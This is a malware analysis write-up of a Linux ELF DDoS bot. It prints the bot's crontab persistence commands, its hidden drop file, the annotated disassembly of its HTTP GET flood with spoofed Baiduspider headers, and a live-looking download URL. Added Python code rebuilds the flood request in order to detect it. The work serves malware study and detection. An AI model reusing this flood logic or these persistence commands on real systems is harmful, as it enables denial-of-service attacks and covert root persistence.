- # MalwareMustDie! ELF analysis
- # Title: "Evolution of a China ELF DDoS'er"
- # Reference, previous analysis: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
- # Note: see how the DDoS functions analysed previously have now been developed into a wider threat..
- # Initial detection in VirusTotal is 0/52 (FUD)
- # https://www.virustotal.com/en/file/19034c5fa31299e1d50e610dc3389d08db064d0c2a0aa1fb0bab0858532cd9c5/analysis/1406548491/
- #File name: sample
- #Detection ratio: 0 / 52
- #Analysis date: 2014-07-28 11:54:51 UTC ( 0 minutes ago )
- / ------------------ /
- / Sample Information /
- / ------------------ /
- / sample /
- MD5 : d96fe80de7483eb961b38456c5b207e8
- SHA256 : 19034c5fa31299e1d50e610dc3389d08db064d0c2a0aa1fb0bab0858532cd9c5
- / source /
- http://122.94.40.23:38384/.taobao
- Mon Jul 27 15:28:32 JST 2014|122.94.40.23||9394 | 122.94.0.0/16 | CTTNET | CN | CHINATIETONG.COM | CHINA TIETONG TELECOMMUNICATIONS CORPORATION
- / ------------------ /
- / Binary analysis /
- / ------------------ /
- / file /
- sample: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- / ELF Header /
- Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
- Class: ELF32
- Data: 2's complement, little endian
- Version: 1 (current)
- OS/ABI: UNIX - System V
- ABI Version: 0
- Type: EXEC (Executable file)
- Machine: Intel 80386
- Version: 0x1
- Entry point address: 0x80480f0
- Start of program headers: 52 (bytes into file)
- Start of section headers: 500x804 (bytes into file)
- Flags: 0x0
- Size of this header: 52 (bytes)
- Size of program headers: 32 (bytes)
- Number of program headers: 4
- Size of section headers: 40 (bytes)
- Number of section headers: 25
- Section header string table index: 22
- / Section Headers /
- [Nr] Name              Type     Addr     Off    Size   ES Flg Lk Inf Al
- [ 0]                   NULL     00000000 000000 000000 00      0   0  0
- [ 1] .init             PROGBITS 080480d4 0000d4 000017 00  AX  0   0  4
- [ 2] .text             PROGBITS 080480f0 0000f0 061524 00  AX  0   0 16
- [ 3] __libc_freeres_fn PROGBITS 080a9614 061614 0008a2 00  AX  0   0  4
- [ 4] __libc_thread_fre PROGBITS 080a9eb8 061eb8 0000dc 00  AX  0   0  4
- [ 5] .fini             PROGBITS 080a9f94 061f94 00001a 00  AX  0   0  4
- [ 6] .rodata           PROGBITS 080a9fc0 061fc0 014b2e 00   A  0   0 32
- [ 7] __libc_atexit     PROGBITS 080beaf0 076af0 000004 00   A  0   0  4
- [ 8] __libc_subfreeres PROGBITS 080beaf4 076af4 00003c 00   A  0   0  4
- [ 9] __libc_thread_sub PROGBITS 080beb30 076b30 000004 00   A  0   0  4
- [10] .eh_frame         PROGBITS 080beb34 076b34 001c10 00   A  0   0  4
- [11] .ctors            PROGBITS 080c1744 078744 00000c 00  WA  0   0  4
- [12] .dtors            PROGBITS 080c1750 078750 00000c 00  WA  0   0  4
- [13] .jcr              PROGBITS 080c175c 07875c 000004 00  WA  0   0  4
- [14] .data.rel.ro      PROGBITS 080c1760 078760 00002c 00  WA  0   0  4
- [15] .got              PROGBITS 080c178c 07878c 000004 04  WA  0   0  4
- [16] .got.plt          PROGBITS 080c1790 078790 00000c 04  WA  0   0  4
- [17] .data             PROGBITS 080c17a0 0787a0 001a34 00  WA  0   0 32
- [18] .bss              NOBITS   080c31e0 07a1d4 083994 00  WA  0   0 32
- [19] __libc_freeres_pt NOBITS   08146b74 07a1d4 000020 00  WA  0   0  4
- [20] .comment          PROGBITS 00000000 07a1d4 000168 00      0   0  1
- [21] .note.ABI-tag     NOTE     080480b4 0000b4 000020 00   A  0   0  4
- [22] .shstrtab         STRTAB   00000000 07a33c 000107 00      0   0  1
- [23] .symtab           SYMTAB   00000000 07a82c 008070 10     24 517  4
- [24] .strtab           STRTAB   00000000 08289c 00770b 00      0   0  1
- Key to Flags:
- W (write), A (alloc), X (execute), M (merge), S (strings)
- I (info), L (link order), G (group), x (unknown)
- O (extra OS processing required) o (OS specific), p (processor specific)
- / Program Headers /
- Type      Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
- LOAD      0x000000 0x08048000 0x08048000 0x78744 0x78744 R E 0x1000
- LOAD      0x078744 0x080c1744 0x080c1744 0x01a90 0x85450 RW  0x1000
- NOTE      0x0000b4 0x080480b4 0x080480b4 0x00020 0x00020 R   0x4
- GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
- / Section to Segment mapping /
- Segment Sections...
- 00 .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_atexit __libc_subfreeres
- __libc_thread_subfreeres .eh_frame .note.ABI-tag
- 01 .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
- 02 .note.ABI-tag
- / What it doesn't have.. /
- There is no dynamic section in this file.
- There are no relocations in this file.
- There are no unwind sections in this file.
- There are no section groups in this file.
- / version info /
- Notes at offset 0x000000b4 with length 0x00000020:
- Owner Data size Description
- GNU 0x00000010 NT_VERSION (version)
- / ------------------ /
- / Reversing Notes.. /
- / ------------------ /
- / the hacks /
- / the files below are opened in an "insecure way" /
- /etc/.mysys (drops)
- /etc/crontab (new schedule…, see below)
- chattr -i /etc/crontab
- chmod +w /etc/crontab
- sed -i '/%s/d' /etc/crontab
- echo '*/1 * * * * root %s/%s %s' >> /etc/crontab
- /* etc conf accessed: */
- /etc/suid-
- /var/tmp
- /var/profile
- /etc/host.conf
- /etc/nsswitch.conf
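As an added defensive check (not part of the original analysis), the following Python audits a system crontab for entries in the shape this sample appends (every minute, as root, from a dropped path). The crontab text, the `/var/tmp/.x/sample` command and the SUSPECT_DIRS list are constructed assumptions for the demo.

```python
import re
from pathlib import Path

# Line the sample appends with: echo '*/1 * * * * root %s/%s %s' >> /etc/crontab
# i.e. every minute, as root, <dir>/<file> <arg>. Before appending it removes any
# earlier line mentioning its name with: sed -i '/%s/d' /etc/crontab
EVERY_MINUTE_ROOT = re.compile(r"^\*/1(\s+\*){4}\s+root\s+(\S+)")
# Assumed list of writable or config locations (the sample touches /var/tmp and
# /etc); an every-minute root job launched from one of them is worth a look.
SUSPECT_DIRS = ("/var/tmp/", "/tmp/", "/dev/shm/", "/etc/")

def suspicious_crontab_lines(crontab_text):
    """Return [(line_no, command)] for every-minute root jobs whose command
    lives under a suspect directory or in a hidden (dot-named) path."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        m = EVERY_MINUTE_ROOT.match(line.strip())
        if not m:
            continue
        cmd = m.group(2)
        hidden = any(part.startswith(".") for part in Path(cmd).parts)
        if cmd.startswith(SUSPECT_DIRS) or hidden:
            findings.append((no, cmd))
    return findings

# Constructed crontab: Debian's default hourly job, a legitimate every-minute
# probe under /usr/lib, and one entry in the shape the sample writes.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /usr/lib/monitoring/probe --quiet
*/1 * * * * root /var/tmp/.x/sample start
"""

if __name__ == "__main__":
    for no, cmd in suspicious_crontab_lines(SAMPLE_CRONTAB):
        print(f"line {no}: every-minute root job from {cmd}")
```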
- / Made in China .. locale hints /
- .rodata:0x80BCCC0 i18n:1999
- .rodata:0x80BCCCA i18n:1999
- .rodata:0x80BCCD4 i18n:1999
- .rodata:080AA05C Accept-Language: zh-CN\r\n
- .rodata:080AA078 User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)\r\n
- / Made by the same coder as previous one.../
- .text:0x804ADC0 mov eax, [ebp+arg_4]
- .text:0x804ADC3 sub esp, 8
- .text:0x804ADC6 push offset aTaobao ; "taobao"
- .text:0x804ADCB push dword ptr [eax]
- / How to grab the DDoS functions /
- start from the public main, then _ConnectServer, then DealwithDDoS, where you see these 5 functions called:
- SYN_Flood
- UDP_Flood
- GET_Flood
- ICMP_Flood
- DNS_Flood
- ; Reference, see embedded picture (see snapshot at: https://twitter.com/MalwareMustDie/status/493729921672310785 )
- / What's new in this variant: L7 attack = HTTP flood, method: GET /
- .text:0x804A5CE loc_804A5CE:; Reference called from function: DealwithDDoS
- .text:0x804A5CE mov eax, [ebp+8]
- .text:0x804A5D1 mov eax, [eax+108h]
- .text:0x804A5D7 cmp eax, [ebp-0Ch]
- .text:0x804A5DA jle locret_804A67F
- .text:0x804A5E0 push dword ptr [ebp+8]
- .text:0x804A5E3 push offset GET_Flood ; go to the next blob...
- .text:0x804A5E8 push 0
- .text:0x804A5EA mov eax, [ebp+var_C]
- .text:0x804A5ED shl eax, 2
- .text:0x804A5F0 add eax, offset id
- .text:0x804A5F5 push eax
- .text:0x804A5F6 call pthread_create ; thread-based setup: one worker thread per iteration..
- .text:0x804A5FB add esp, 10h
- .text:0x804A5FE mov [ebp+var_41C], eax
- .text:0x804A604 lea eax, [ebp+var_C]
- .text:0x804A607 inc dword ptr [eax]
- .text:0x804A609 jmp short loc_804A5CE
- { : }
- .text:0x8049018 public GET_Flood
- .text:0x8049018 GET_Flood proc near; ; Reference called from function: DealwithDDoS
- .text:0x8049018 var_1015C = dword ptr -1015Ch
- .text:0x8049018 var_10158 = dword ptr -10158h
- .text:0x8049018 var_10154 = dword ptr -10154h
- .text:0x8049018 var_10148 = dword ptr -10148h
- .text:0x8049018 var_144 = dword ptr -144h
- .text:0x8049018 var_140 = dword ptr -140h
- .text:0x8049018 fd = dword ptr -13Ch
- .text:0x8049018 var_138 = dword ptr -138h
- .text:0x8049018 var_38 = dword ptr -38h
- .text:0x8049018 var_28 = dword ptr -28h
- .text:0x8049018 var_C = dword ptr -0Ch
- .text:0x8049018 arg_0 = dword ptr 8
- .text:0x8049018
- .text:0x8049018 push ebp ; threading started....
- .text:0x8049019 mov ebp, esp
- .text:0x804901B push ebx
- .text:0x804901C sub esp, 10164h
- .text:0x8049022 sub esp, 0Ch
- .text:0x8049025 sub esp, 4
- .text:0x8049028 call pthread_self
- .text:0x804902D add esp, 4
- .text:0x8049030 push eax
- .text:0x8049031 call pthread_detach
- .text:0x8049036 add esp, 10h
- .text:0x8049039 mov eax, [ebp+arg_0]
- .text:0x804903C mov [ebp+var_C], eax
- .text:0x804903F sub esp, 4
- .text:0x8049042 push 118h
- .text:0x8049047 push [ebp+var_C]
- .text:0x804904A lea eax, [ebp+var_138]
- .text:0x8049050 push eax
- .text:0x8049051 call memcpy ; copies the 0x118-byte target/config struct (the thread arg) onto the stack..
- .text:0x8049056 add esp, 10h
- .text:0x8049059 sub esp, 4
- .text:0x804905C push 10h
- .text:0x804905E push 0
- .text:0x8049060 lea eax, [ebp+var_10158]
- .text:0x8049066 push eax
- .text:0x8049067 call memset
- .text:0x804906C add esp, 10h
- .text:0x804906F sub esp, 8
- .text:0x8049072 push 10h
- .text:0x8049074 lea eax, [ebp+var_10158]
- .text:0x804907A push eax
- .text:0x804907B call bzero
- .text:0x8049080 add esp, 10h
- .text:0x8049083 mov word ptr [ebp+var_10158], 2 ; sockaddr_in.sin_family = AF_INET
- .text:0x804908C mov eax, [ebp+var_38] ; port field of the copied struct
- .text:0x804908F movzx eax, ax
- .text:0x8049092 sub esp, 0Ch
- .text:0x8049095 push eax
- .text:0x8049096 call ntohs
- .text:0x804909B add esp, 10h
- .text:0x804909E mov word ptr [ebp+var_10158+2], ax ; sin_port
- .text:0x80490A5 sub esp, 0Ch
- .text:0x80490A8 lea eax, [ebp+var_138]
- .text:0x80490AE push eax
- .text:0x80490AF call AnalysisAddress ; turns the target in the struct into an address (see the "%lu.%lu.%lu.%lu" note below)
- .text:0x80490B4 add esp, 10h
- .text:0x80490B7 mov [ebp+var_10154], eax ; sin_addr
- .text:0x80490BD
- .text:0x80490BD loc_80490BD: ; CODE XREF: GET_Flood+3B6j
- .text:0x80490BD sub esp, 4
- .text:0x80490C0 push 0
- .text:0x80490C2 push 1
- .text:0x80490C4 push 2 ; args: socket(AF_INET, SOCK_STREAM, 0)
- .text:0x80490C6 call socket ; socket operations are initiated here..
- .text:0x80490CB add esp, 10h
- .text:0x80490CE mov [ebp+fd], eax
- .text:0x80490D4 sub esp, 4
- .text:0x80490D7 push 10h
- .text:0x80490D9 lea eax, [ebp+var_10158]
- .text:0x80490DF push eax
- .text:0x80490E0 push [ebp+fd] ; args
- .text:0x80490E6 call connect ; using the arg to connect..
- .text:0x80490EB add esp, 10h
- .text:0x80490EE cmp eax, 0FFFFFFFFh
- .text:0x80490F1 jnz short loc_8049109
- .text:0x80490F3 sub esp, 0Ch
- .text:0x80490F6 push [ebp+fd] ; fd
- .text:0x80490FC call close
- .text:0x8049101 add esp, 10h
- .text:0x8049104 jmp loc_80493C7
- .text:0x8049109
- .text:0x8049109 loc_8049109: ; if everything ok, this GET will be in loops..
- .text:0x8049109 sub esp, 4
- .text:0x804910C push 4
- .text:0x804910E push offset aGet ; "GET "
- .text:0x8049113 lea eax, [ebp+var_10148]
- .text:0x8049119 push eax
- .text:0x804911A call memcpy
- .text:0x804911F add esp, 10h
- .text:0x8049122 mov [ebp+var_140], 4
- .text:0x804912C sub esp, 4
- .text:0x804912F lea eax, [ebp+var_138]
- .text:0x8049135 sub eax, 0FFFFFF80h ; i.e. add 0x80: the request path string inside the copied struct
- .text:0x8049138 sub esp, 8
- .text:0x804913B push eax
- .text:0x804913C call strlen
- .text:0x8049141 add esp, 0Ch
- .text:0x8049144 push eax
- .text:0x8049145 lea eax, [ebp+var_138]
- .text:0x804914B sub eax, 0FFFFFF80h
- .text:0x804914E push eax
- .text:0x804914F lea eax, [ebp+var_10148]
- .text:0x8049155 add eax, [ebp+var_140]
- .text:0x804915B push eax
- .text:0x804915C call memcpy
- .text:0x8049161 add esp, 10h
- .text:0x8049164 lea eax, [ebp+var_138]
- .text:0x804916A sub eax, 0FFFFFF80h
- .text:0x804916D sub esp, 0Ch
- .text:0x8049170 push eax
- .text:0x8049171 call strlen
- .text:0x8049176 add esp, 10h
- .text:0x8049179 mov edx, eax
- .text:0x804917B lea eax, [ebp+var_140]
- .text:0x8049181 add [eax], edx
- .text:0x8049183 cmp [ebp+var_28], 0 ; flag in the copied struct: append a random suffix to the path?
- .text:0x8049187 jz short loc_80491FC
- .text:0x8049189 sub esp, 0Ch
- .text:0x804918C push 0
- .text:0x804918E call time
- .text:0x8049193 add esp, 4
- .text:0x8049196 push eax
- .text:0x8049197 call srandom
- .text:0x804919C add esp, 10h
- .text:0x804919F mov eax, [ebp+var_140]
- .text:0x80491A5 mov [ebp+var_144], eax
- .text:0x80491AB
- .text:0x80491AB loc_80491AB: ; loop: append 5 random lowercase letters to the path
- .text:0x80491AB mov eax, [ebp+var_140]
- .text:0x80491B1 add eax, 5
- .text:0x80491B4 cmp eax, [ebp+var_144]
- .text:0x80491BA jle short loc_80491F3
- .text:0x80491BC lea eax, [ebp+var_10148]
- .text:0x80491C2 mov ebx, eax
- .text:0x80491C4 add ebx, [ebp+var_144]
- .text:0x80491CA call rand
- .text:0x80491CF mov edx, eax
- .text:0x80491D1 mov [ebp+var_1015C], 1Ah ; 26
- .text:0x80491DB mov eax, edx
- .text:0x80491DD cdq
- .text:0x80491DE idiv [ebp+var_1015C]
- .text:0x80491E4 lea eax, [edx+61h] ; rand() % 26 + 'a'
- .text:0x80491E7 mov [ebx], al
- .text:0x80491E9 lea eax, [ebp+var_144]
- .text:0x80491EF inc dword ptr [eax]
- .text:0x80491F1 jmp short loc_80491AB
- .text:0x80491F3
- .text:0x80491F3 loc_80491F3:
- .text:0x80491F3 lea eax, [ebp+var_140]
- .text:0x80491F9 add dword ptr [eax], 5
- .text:0x80491FC
- .text:0x80491FC loc_80491FC:
- .text:0x80491FC sub esp, 4
- .text:0x80491FF push 0Bh ; here goes the headers....
- .text:0x8049201 push offset aHttp1_1 ; " HTTP/1.1\r\n"
- .text:0x8049206 lea eax, [ebp+var_10148]
- .text:0x804920C add eax, [ebp+var_140]
- .text:0x8049212 push eax
- .text:0x8049213 call memcpy
- .text:0x8049218 add esp, 10h
- .text:0x804921B lea eax, [ebp+var_140]
- .text:0x8049221 add dword ptr [eax], 0Bh
- .text:0x8049224 sub esp, 4
- .text:0x8049227 push 2Fh
- .text:0x8049229 push offset aAcceptTextHtml ; "Accept: text/html, application/xhtml+xm"...
- .text:0x804922E lea eax, [ebp+var_10148]
- .text:0x8049234 add eax, [ebp+var_140]
- .text:0x804923A push eax
- .text:0x804923B call memcpy
- .text:0x8049240 add esp, 10h
- .text:0x8049243 lea eax, [ebp+var_140]
- .text:0x8049249 add dword ptr [eax], 2Fh
- .text:0x804924C sub esp, 4
- .text:0x804924F push 18h
- .text:0x8049251 push offset aAcceptLanguage ; "Accept-Language: zh-CN\r\n"
- .text:0x8049256 lea eax, [ebp+var_10148]
- .text:0x804925C add eax, [ebp+var_140]
- .text:0x8049262 push eax
- .text:0x8049263 call memcpy
- .text:0x8049268 add esp, 10h
- .text:0x804926B lea eax, [ebp+var_140]
- .text:0x8049271 add dword ptr [eax], 18h
- .text:0x8049274 sub esp, 4
- .text:0x8049277 push 61h
- .text:0x8049279 push offset aUserAgentMozil ; "User-Agent: Mozilla/5.0+(compatible;+Ba"...
- .text:0x804927E lea eax, [ebp+var_10148]
- .text:0x8049284 add eax, [ebp+var_140]
- .text:0x804928A push eax
- .text:0x804928B call memcpy
- .text:0x8049290 add esp, 10h
- .text:0x8049293 lea eax, [ebp+var_140]
- .text:0x8049299 add dword ptr [eax], 61h
- .text:0x804929C sub esp, 4
- .text:0x804929F push 20h
- .text:0x80492A1 push offset aAcceptEncoding ; "Accept-Encoding: gzip, deflate\r\n"
- .text:0x80492A6 lea eax, [ebp+var_10148]
- .text:0x80492AC add eax, [ebp+var_140]
- .text:0x80492B2 push eax
- .text:0x80492B3 call memcpy
- .text:0x80492B8 add esp, 10h
- .text:0x80492BB lea eax, [ebp+var_140]
- .text:0x80492C1 add dword ptr [eax], 20h
- .text:0x80492C4 sub esp, 4
- .text:0x80492C7 push 6
- .text:0x80492C9 push offset aHost ; "Host: "
- .text:0x80492CE lea eax, [ebp+var_10148]
- .text:0x80492D4 add eax, [ebp+var_140]
- .text:0x80492DA push eax
- .text:0x80492DB call memcpy
- .text:0x80492E0 add esp, 10h
- .text:0x80492E3 lea eax, [ebp+var_140]
- .text:0x80492E9 add dword ptr [eax], 6
- .text:0x80492EC sub esp, 4
- .text:0x80492EF lea eax, [ebp+var_138]
- .text:0x80492F5 sub esp, 8
- .text:0x80492F8 push eax
- .text:0x80492F9 call strlen
- .text:0x80492FE add esp, 0Ch
- .text:0x8049301 push eax
- .text:0x8049302 lea eax, [ebp+var_138]
- .text:0x8049308 push eax
- .text:0x8049309 lea eax, [ebp+var_10148]
- .text:0x804930F add eax, [ebp+var_140]
- .text:0x8049315 push eax
- .text:0x8049316 call memcpy
- .text:0x804931B add esp, 10h
- .text:0x804931E lea eax, [ebp+var_138]
- .text:0x8049324 sub esp, 0Ch
- .text:0x8049327 push eax
- .text:0x8049328 call strlen
- .text:0x804932D add esp, 10h
- .text:0x8049330 mov edx, eax
- .text:0x8049332 lea eax, [ebp+var_140]
- .text:0x8049338 add [eax], edx
- .text:0x804933A sub esp, 4
- .text:0x804933D push 1Ah
- .text:0x804933F push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n"
- .text:0x8049344 lea eax, [ebp+var_10148]
- .text:0x804934A add eax, [ebp+var_140]
- .text:0x8049350 push eax
- .text:0x8049351 call memcpy
- .text:0x8049356 add esp, 10h
- .text:0x8049359 lea eax, [ebp+var_140]
- .text:0x804935F add dword ptr [eax], 1Ah
- .text:0x8049362 sub esp, 4
- .text:0x8049365 push 14h
- .text:0x8049367 push offset aPragmaNoCache ; "Pragma: no-cache\r\n\r\n"
- .text:0x804936C lea eax, [ebp+var_10148]
- .text:0x8049372 add eax, [ebp+var_140]
- .text:0x8049378 push eax
- .text:0x8049379 call memcpy
- .text:0x804937E add esp, 10h
- .text:0x8049381 lea eax, [ebp+var_140]
- .text:0x8049387 add dword ptr [eax], 14h
- .text:0x804938A sub esp, 8
- .text:0x804938D push 1 ; SIG_IGN
- .text:0x804938F push 0Dh ; SIGPIPE (13)
- .text:0x8049391 call ssignal ; signal(SIGPIPE, SIG_IGN): a peer closing the socket must not kill the thread
- .text:0x8049396 add esp, 10h
- .text:0x8049399 push 0
- .text:0x804939B push [ebp+var_140]
- .text:0x80493A1 lea eax, [ebp+var_10148]
- .text:0x80493A7 push eax
- .text:0x80493A8 push [ebp+fd] ; args
- .text:0x80493AE call send
- .text:0x80493B3 add esp, 10h
- .text:0x80493B6 sub esp, 0Ch
- .text:0x80493B9 push [ebp+fd] ; fd
- .text:0x80493BF call close
- .text:0x80493C4 add esp, 10h
- .text:0x80493C7
- .text:0x80493C7 loc_80493C7: ; done...
- .text:0x80493C7 cmp StopFlag, 1 ; global stop flag
- .text:0x80493CE jnz loc_80490BD ; not set: back to socket()/connect()/send() again
- .text:0x80493D4 sub esp, 0Ch
- .text:0x80493D7 push offset aSuccess ; "success"
- .text:0x80493DC call pthread_exit
- .text:0x80493DC GET_Flood endp
- / HTTP GET Flood's headers summarized, pretending to be the Baidu spider /
- .rodata:0x80AA01A GET
- .rodata:0x80AA01F HTTP/1.1\r\n
- .rodata:0x80AA02C Accept: text/html, application/xhtml+xml, */*\r\n
- .rodata:0x80AA05C Accept-Language: zh-CN\r\n
- .rodata:0x80AA078 User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)\r\n
- .rodata:0x80AA0DC Accept-Encoding: gzip, deflate\r\n
- .rodata:0x80AA0FD Host:
- .rodata:0x80AA104 \r\nConnection: Keep-Alive\r\n
- .rodata:0x80AA11F Pragma: no-cache\r\n\r\n
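As an added example (not code from the original analysis or from the sample), this Python reconstructs one request exactly as GET_Flood assembles it from the strings above, so the header lengths can be cross-checked against the memcpy sizes, and then checks a raw request against that fingerprint for detection. The host "victim.example", the path "/" and the suffix "kqzbn" are constructed values; the genuine Baiduspider UA separates its tokens with spaces, while this sample uses literal '+' characters, which is the strongest single indicator.

```python
import re

# Header strings GET_Flood copies into its buffer, in the order the
# disassembly above shows (memcpy sizes 0x2F, 0x18, 0x61, 0x20, 0x1A, 0x14).
FAKE_BAIDU_UA = ("Mozilla/5.0+(compatible;+Baiduspider/2.0;"
                 "++http://www.baidu.com/search/spider.html)")
HEADER_BLOCK = ("Accept: text/html, application/xhtml+xml, */*\r\n"
                + "Accept-Language: zh-CN\r\n"
                + "User-Agent: " + FAKE_BAIDU_UA + "\r\n"
                + "Accept-Encoding: gzip, deflate\r\n")
TRAILER = "\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n\r\n"
EXPECTED_ORDER = ["accept", "accept-language", "user-agent",
                  "accept-encoding", "host", "connection", "pragma"]
# With the random-path flag set, loc_80491AB appends five bytes of
# rand() % 26 + 'a' to the configured path (assumed here to be "/").
RANDOM_PATH = re.compile(r"^/[a-z]{5}$")

def build_expected_request(host, path="/", suffix=""):
    """Reconstruct the exact bytes the sample sends, for signature testing."""
    return ("GET " + path + suffix + " HTTP/1.1\r\n" + HEADER_BLOCK
            + "Host: " + host + TRAILER).encode()

def parse_request(raw):
    """Split a raw request into (method, target, [(name, value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target = (lines[0].split(" ") + ["", ""])[:2]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers

def getflood_indicators(raw):
    """Return the fingerprint hits for one request; [] means no match."""
    method, target, headers = parse_request(raw)
    names = [n for n, _ in headers]
    values = dict(headers)
    hits = []
    if values.get("user-agent") == FAKE_BAIDU_UA:
        hits.append("plus_encoded_baiduspider_ua")
    if names == EXPECTED_ORDER:
        hits.append("exact_header_order")
    if values.get("accept-language") == "zh-CN" and values.get("pragma") == "no-cache":
        hits.append("zh-CN_with_pragma_no_cache")
    if method == "GET" and RANDOM_PATH.match(target):
        hits.append("five_random_lowercase_path")
    return hits

# Constructed samples: one reproduced flood request, one ordinary browser request.
SAMPLE_FLOOD = build_expected_request("victim.example", "/", "kqzbn")
SAMPLE_NORMAL = (b"GET /index.html HTTP/1.1\r\nHost: victim.example\r\n"
                 b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
                 b"Accept: text/html\r\n\r\n")

if __name__ == "__main__":
    print("flood :", getflood_indicators(SAMPLE_FLOOD))
    print("normal:", getflood_indicators(SAMPLE_NORMAL))
```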
- / how the ip target is fed, applied to the L7 flood by ARG /
- push offset aLu_Lu_Lu_Lu ; "%lu.%lu.%lu.%lu"
- push 10h
- / --------------------------------------- /
- / Debugging… the first box returned ENOSYS for _sysctl, so a kernel with that sys call compiled in was needed /
- / --------------------------------------- /
- / debug - 1st try /
- ; non root
- execve("./sample", ["./sample"], [/* 17 vars */]) = 0
- [ Process PID=32400 runs in 32 bit mode. ]
- uname({sys="Linux", node="1x111", ...}) = 0
- brk(0) = 0x8566000
- brk(0x8587000) = 0x8587000
- getrlimit(RLIMIT_STACK, {rlim_cur=-4286578688, rlim_max=0}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=-4292874240, rlim_max=0}) = 0
- getpid() = 32400
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], 0}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({0x2080aa344, -6106976, (nil), (nil), (nil), 18420514605488689824}) = -1 ENOSYS (Function not implemented)
- open("/proc/sys/kernel/version", O_RDONLY) = 3
- read(3, "#1 SMP Debian 3.2.60-1+deb7u1\n", 512) = 30
- close(3) = 0
- fork() = 32402
- exit_group(0) = ?
- rik@1x111 ~ $
- ; root
- execve("./sample", ["./sample"], [/* 20 vars */]) = 0
- [ Process PID=649 runs in 32 bit mode. ]
- uname({sys="Linux", node="1x111", ...}) = 0
- brk(0) = 0x9788000
- brk(0x97a9000) = 0x97a9000
- getrlimit(RLIMIT_STACK, {rlim_cur=-4286578688, rlim_max=0}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=-4292874240, rlim_max=0}) = 0
- getpid() = 649
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], 0}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({0x2080aa344, -7628784, (nil), (nil), (nil), 18413978489897898656}) = -1 ENOSYS (Function not implemented)
- open("/proc/sys/kernel/version", O_RDONLY) = 3
- read(3, "#1 SMP Debian 3.2.60-1+deb7u1\n", 512) = 30
- close(3) = 0
- fork() = 650
- exit_group(0) = ?
- ; the dropped file exists...
- # ls -alF /etc/.mysys
- ---------- 1 root root 0 Jul 28 12:57 /etc/.mysys
- / next (2nd) try /
- ; non root
- execve("./sample", ["./sample"], [/* 21 vars */]) = 0
- uname({sys="Linux", node="malware.must.die", ...}) = 0
- brk(0) = 0x9f3d000
- brk(0x9f5e000) = 0x9f5e000
- getrlimit(RLIMIT_STACK, {rlim_cur=10240*1024, rlim_max=RLIM_INFINITY}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=2044*1024, rlim_max=RLIM_INFINITY}) = 0
- getpid() = 1786
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({{CTL_KERN, KERN_VERSION}, 2, 0xbff22b10, 30, (nil), 0}) = 0
- fork() = 1787
- --- SIGCHLD (Child exited) @ 0 (0) ---
- exit_group(0) = ?
- ; root
- execve("./sample", ["./sample"], [/* 18 vars */]) = 0
- uname({sys="Linux", node="malware.must.die", ...}) = 0
- brk(0) = 0xa057000
- brk(0xa078000) = 0xa078000
- getrlimit(RLIMIT_STACK, {rlim_cur=10240*1024, rlim_max=RLIM_INFINITY}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=2044*1024, rlim_max=RLIM_INFINITY}) = 0
- getpid() = 1822
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({{CTL_KERN, KERN_VERSION}, 2, 0xbfe50b70, 30, (nil), 0}) = 0
- fork() = 1823
- --- SIGCHLD (Child exited) @ 0 (0) ---
- exit_group(0) = ?
- ; the dropped file exists...
- ls -alF /etc/.mysys
